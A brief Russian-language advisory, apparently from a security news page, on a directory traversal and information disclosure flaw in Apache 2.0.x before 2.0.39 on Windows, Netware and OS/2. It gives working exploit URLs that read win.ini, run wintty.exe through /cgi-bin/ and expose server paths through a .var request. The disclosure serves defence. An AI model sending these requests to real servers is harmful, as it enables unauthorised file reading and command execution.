В apache 2.0.x для Win/Netware/OS2 обнаружена возможность обхода каталога и раскрытие информации. 

1. Обход основного каталога: 

В apache не фильтруется символ '\' = %5c, который может использоваться как разделитель пути
(Windows, Netware, OS2 и другие). Уязвимость позволяет просмотреть содержание произвольных файлов и может использоваться для выполнения произвольных команд, через /cgi-bin/. 

Пример: 

Просматривает win.ini:

http://127.0.0.1/error/%5c%2e%2e%5c%2e%2e
%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini 

Запускает утилиту wintty:

http://127.0.0.1/cgi-bin/%5c%2e%2e%5cbin%5cwintty.exe?%2dt+HELL 

2. Раскрытие информации: 

Некорректный запрос к несуществующему var файлу, раскроет некоторую информацию о Web сервере (физическое расположение, версия и т.п.). Пример: 

На запрос 

http://127.0.0.1/error/HTTP_NOT_FOUND.html.var 

cервер ответит в частности следующее:

| * C:/server/Apache Group/Apache2/error/HTTP_NOT_FOUND.html.var, type 
| text/html, language de
| * C:/server/Apache Group/Apache2/error/ HTTP_NOT_FOUND.html.var, type text/html, language en
| * C:/server/Apache Group/Apache2/error/ HTTP_NOT_FOUND.html.var, type text/html, language es
| * C:/server/Apache Group/Apache2/error/ HTTP_NOT_FOUND.html.var , type text/html, language fr

Уязвимость обнаружена в 2.0.x до 2.0.39.

Подписаться
Уведомить о
0 комментариев
Межтекстовые Отзывы
Посмотреть все комментарии